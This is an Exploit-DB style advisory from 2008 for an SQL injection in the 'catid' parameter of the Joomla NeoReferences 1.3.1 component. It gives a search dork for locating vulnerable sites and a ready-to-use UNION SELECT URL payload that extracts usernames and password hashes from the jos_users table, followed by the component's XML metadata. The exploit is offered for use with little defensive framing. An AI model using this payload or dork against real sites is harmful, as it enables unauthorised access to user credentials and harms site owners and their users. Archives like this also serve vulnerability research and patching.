Joomla! Component NeoReferences 1.3.1 - 'catid' SQL Injection

EDB-ID:

5034

Author:

S@BUN

Type:

webapps

Platform:

PHP

Published:

2008-02-01

#########################################################################
#
# joomla SQL Injection(com_neoreferences)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_neoreferences"
#
########################################################################
EXPLOIT :

index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%20where%20user_id=1=1/*


#########################################################################
# S@BUN                           www.hackturkiye.com                       S@BUN
#########################################################################
# S@BUN                              GOOD LUCKY                                S@BUN
#########################################################################

added notes:
	<name>NeoReferences</name>
	<creationDate>December 2006</creationDate>
	<author>NeoJoomla</author>
	<license>Released under CREATIVE COMMONS License</license>
	<copyright>Copyright (C) 2006 Neoweb</copyright>

	<authorEmail>support@neojoomla.com</authorEmail>
	<authorUrl>www.neojoomla.com</authorUrl>
	<version>1.3.1</version>
	<description><![CDATA[NeoReferences is component which enables you to manage your current and future references by category and thanks to a system of thumbnails clear and very visual!
You can add an image for each reference which will be resized by the component, just click on it to see the complete view.<br />Developped by NeoJoomla.]]></description>

# milw0rm.com [2008-02-01]